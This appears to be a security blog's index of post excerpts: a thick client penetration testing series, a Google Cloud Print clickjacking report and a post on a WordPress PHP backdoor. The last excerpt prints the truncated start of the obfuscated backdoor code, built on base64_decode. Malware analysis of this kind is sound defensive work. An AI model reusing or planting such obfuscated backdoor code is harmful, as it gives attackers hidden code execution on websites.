Memory Forensics & Reverse Engineering : Thick Client Penetration Testing – Part 4

Static Analysis/ Reverse Engineering for Thick Clients Penetration Testing 4 Hi Readers, let’s take a look into static analysis. The advantage which thick clients offer over web applications are the ability to inspect the code and perform code level fuzzing which is more interesting for me! How to inspect code at a static level? There […]

Java Deserialization Exploit Resulting RCE on Thick Client Penetration Testing – Part 3

Thick Client Penetration Testing – 3 covering the Java Deserialization Exploit Resulting Remote Code Execution Welcome Readers, in the previous two blogs, we have learnt about the various test cases as well as setting up traffic for thick clients using interception proxy. Among the plethora of test cases out here, one particularly interesting is about […]

Detailed Traffic Analysis for Thick Client Penetration Testing – Part 2

After getting the basics of thick client pentest, let’s delve into the very first steps you can take to commence thick client pentest. Interception and setting up proxy of application. Thick clients can be broken down into two types based on proxy settings: Proxy aware Proxy unaware Proxy aware are those applications which has settings […]

Introduction to Thick Client Penetration Testing – Part 1

Why thick client penetration testing? Thick client applications are not new having been in existence for a long time, however if given to perform a pentest on thick clients, it is not as simple as a Web Application Pentest. Thick clients are majorly used across organizations for their internal operations. In this series of articles, […]

Google Cloud Print ClickJacking Vulnerability

Last weekend, I had a chance to use the Google cloud print service and found Clickjacking vulnerability. Obviously, X-Frame-Options response header was missing as shown in the below image. According to the new Google bug bounty program, if clickjacking vulnerability is performed using two clicks will not be considered for VRP or bug. That’s why […]

Backdoor PHP code WordPress

We have detected a Backdoor PHP code. It is often hidden in the WP writable directory. This backdoor is used to send PHP code execution.   <?php $yeqqdvu = 6110; function neceliemyz($rdcldpm, $oqwvlr) { $efogjgyh = ”; for($i=0; $i < strlen($rdcldpm); $i++){ $efogjgyh .= isset($oqwvlr[$rdcldpm[$i]]) ? $oqwvlr[$rdcldpm[$i]] : $rdcldpm[$i]; } $pgdnvjl=”base64_decode”; return $pgdnvjl($efogjgyh); } $hljnyoyp […]